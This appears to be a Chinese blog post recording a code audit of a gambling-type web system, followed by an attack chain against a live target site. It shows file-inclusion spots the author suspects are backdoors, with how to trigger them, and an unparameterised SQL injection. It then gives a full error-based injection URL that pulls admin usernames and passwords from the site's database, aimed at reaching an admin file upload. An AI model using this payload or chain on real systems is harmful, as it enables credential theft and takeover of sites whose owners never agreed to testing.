审计某bc系统实现代码执行

朋友发给我一个bc系统让我审计,记录下过程。

文件包含

360safe/360webscan.php
if(isset($_GET['debug']) && $_GET['debug']){
    $debug = $_GET['debug'];
    include_once($debug);
}

这处感觉比较像后门,也有可能是开发者忘记删除的,利用比较简单: ?debug=file

m/lotto/index.php
if(isset($_GET['xp']) && $_GET['xp']){
    $xp = $_GET['xp'];
    include_once($xp);
}

这个也感觉是后门,利用方式和上面一样。

SQL注入

show/bk_danshi_data.php
if($wap == 'wap' and !empty($_GET['leaguename'])){ //手机端选择
	$sqlwhere .= ' and Match_Name = \''.$_GET['leaguename'].'\'';
}

此处$sqlwhere直接把$_GET['leaguename']直接拼接到字符串里面,未经过任何过滤

后面判断$_GET['ids']为空的话,就把$sqlwhere拼接到$sql里面带入query查询,跟进后发现$mydata1_db就是一个PDO查询,没有使用参数化查询,导致了SQL注入。

$mydata1_db = new PDO('mysql:host=127.0.0.1;dbname=mydata1_db;charset=utf8', $db_user_utf8, $db_pwd_utf8, $driver_options);

文件上传

ad888\wangEditor\upload.php
@session_start();
if (!isset($_SESSION['adminid'])) {
		logout_msg('您的登录已过期,请重新登录!');
}

由于$_SESSION['adminid']不可控,所以此处只能透过上面的SQL注入来获取账号密码登陆后台上传


跟进后台登陆代码,可以发现登陆的SQL查询,方便我们构造payload。

$stmt = $mydata1_db->prepare('select uid,quanxian,ip,about,address,login_pwd,login_name from mydata3_db.sys_admin where login_name=:login_name and login_pwd=:login_pwd limit 1');

刚好目标站是开启php错误的,可以直接进行报错注入,省略许多盲注时间,Payload:

/show/bk_danshi_data.php?wap=wap&leaguename=%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x23,login_name,0x3a,login_pwd,0x23)%20FROM%20mydata3_db.sys_admin%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *